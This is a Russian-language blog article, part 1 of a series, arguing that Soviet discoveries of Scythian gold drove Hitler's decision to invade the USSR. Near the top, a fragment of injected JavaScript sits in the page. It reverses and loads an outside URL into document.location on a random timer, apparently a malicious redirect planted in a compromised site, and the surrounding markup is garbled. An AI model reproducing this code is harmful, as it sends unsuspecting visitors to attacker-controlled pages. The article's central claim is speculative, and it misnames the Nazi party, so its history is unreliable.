Исследования Протестантские авторы

Скифские арийцы. Кольцо власти Адольфа ГитлераНа чтение 5 мин


toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor has-alpha-channel-opacity»/>

Часть 1

Кольцо власти Адольфа Гитлера

История нападения гитлеровской Германии на Советский Союз до сих пор хранит немало неразрешенных загадок. Моя статья, конечно, не о войне, и не претендует на то, чтобы эти загадки разрешить. В истории нападения Гитлера на Советский Союз я укажу вам лишь на одну интересную деталь, которая, как мне кажется, сыграла определенную, если не определяющую роль в решении Гитлера напасть на Советский Союз. И эта причина – в обнаружении советскими археологами второй половины тридцатых годов на территории Советского Союза скифских курганов, скифского золота и скифской культуры.

Выкованное скифами золото имело для Гитлера, пожалуй, не меньшее притяжение, чем кольцо власти для Саурона из Трилогии Джона Толкиена – я покажу это. А затем я сделаю еще один шаг, последний логический неизбежный шаг в этой странной Европейской истории. Я скажу, к порогу какой тайны подошел Гитлер в своих поисках настоящих арийцев. И покажу, в каком паническом страхе он будет от собственной находки. Но не буду пока ничего говорить про эту серию. Достаточного для одного дня одного шока.

В этой статье я расскажу вам немного о загадочном скифском золоте, и о том, почему находка скифских курганов так ошарашила германских археологов и окончательно свела Гитлера с ума. И он решился пойти и взять то, что, как он считал, принадлежало ему одному: золотое кольцо власти. Я сейчас все объясню по порядку. Начну с начала.

Немецкая археология первой половины двадцатого века была, как и всякая наука всегда и везде – глубоко политизирована. И, тем не менее, именно она и подняла мировую археологию на должную высоту, сделало ее наукой. Труды немецких археологов девятнадцатого и первой половины двадцатого веков задали параметры, направления и стандарты качества археологической науки. Еще в 1990-ые годы я изучал их в университете наряду с самыми современными исследованиями. И они, эти старые немецкие исследования – если уметь удалять из них идеологический элемент – показались мне не менее, а пожалуй более доскональными и систематическими, чем многие современные вбросы. Впрочем, не мне судить: признаюсь, я не археолог, и университетские курсы по археологии брал лишь в связи с моим изучением истории и религии древнего мира.

Еще в 1911-ом году немецкие историки и археологи сформировали «теорию поселений», которая до сих пор во многом используется в библейской археологии. Это целая система, когда по найденным артефактам определялся возраст, культура, этнография, политическая зависимость поселения и прочее. Систематизация и классификация данных, точные измерения, подробные записи и дневники исследований, химический анализ, аналитические сравнения в археологии – все это пришло в мир через немецкую археологию того времени. Так что в этом отношении я испытываю к ней великое уважение. Но была у немецкой археологии и другая задача. И она была определяющей.

Своей главной целью и задачей немецкая археология видела восстановление наследства арийских предков. Сразу же с приходом к власти национально-демократической партии были созданы две археологические организации AMT Rosenberg (1933) и SS-Ahnenerbe (1934). #Аненербе буквально переводится с немецкого языка как «Наследство предков». Эта организация состояла из множества отделов, в числе которых были и Исследовательский отдел раскопок и Исследовательский отдел курганов. На археологию нацисты не жалели средств, а отчитывалась «Аненербе» непосредственно Генриху Гиммлеру.

Аненербе

В моем «сериале» об арийцах и семитах я подробно остановлюсь на истории идеи «истинного арийства». Ее, на самом деле, очень мало кто и знает. Забегая вперед скажу, очень кратенько, что поначалу немцы глядели на Иран (буквально – Ариан, т.е. Земля Ариев) как на пра-родину истинных арийцев. Во многом они были близки к истине, как мы увидим. Но с приходом к власти Гитлера, отличавшегося крайним национализмом, всякий ближневосточный элемент арийства оказывался под подозрением. Более того, Гитлер поддержал «нордическую» теорию происхождения германцев, арийцев. По этой теории (которой, кстати, до сих пор безумно вторят историки) арийцы пришли с севера, из Скандинавии.

С приходом Гитлера прежде обширная Иранская археологическая программа Германии если не закрывается совсем, то заметно уменьшается. Фюрер смотрел теперь на Север. Он верил, что копать надо там, что на Севере будет найдена настоящая пра-родина арийцев.

Аненербе с энтузиазмом взялся за раскопки Севера. Снаряжались экспедиция за экспедицией в Скандинавские страны, в Данию, в Финляндию. Были некоторые интересные находки, некоторые даже достойные музеев. Но разочарования было гораздо больше – Гитлера на этот раз подвел его нюх. Любя Север романтической любовью, Гитлер ожидал, что Север окажется просто напичкан доказательствами арийского присутствия. Но ничего особенного не произошло. Археологи продолжали находить остовы варяжских кораблей, горшки, наконечники стрел и прочую утварь, которая мало о чем говорит. И как ни напрягались теоретики «теории поселений» свести концы с концами, ничего не получалось.

Золото скифов. Часть 1. Кольцо власти Адольфа Гитлера

И тут внезапно Советский Союз объявляет находку за находкой. Да какие это были находки! Советские археологи начали раскопки скифских курганов. И нашли остатки блестящей цивилизации! Весь мир облетели известия о скифском золоте и картинки, срисованные с этого золота. Впервые археология обнаружила изображения людей – и в больших количества – которые даже по строжайшим стандартам Гиммлера – соответствовали арийской нации! Это были изображения людей, которые выглядели как немцы. Или – но об этом Гитлер тогда не хотел думать – как славяне.

Но не уходите далеко, друзья. В следующей статье этого короткого цикла я расскажу вам – какая именно находка, на мой взгляд, свела Гитлера с ума и заставила его поменять все свои военные и стратегические планы. И потом вы скажите мне – а могло ли быть иначе?!

Читать часть 2

Поделитесь своими мыслями ниже, в комментариях.

Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.

Мы в соцсетях

Солёное радиоTelegram, YouTube, ВКонтакте, Яндекс Дзен

Открытая семинарияTelegram, YouTube, ВКонтакте, Яндекс Дзен

«Новости христианства» — Telegtam, Facebook, ВКонтакте

4.3/5

You Might Also Like

No Comments

    Leave a Reply

    Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.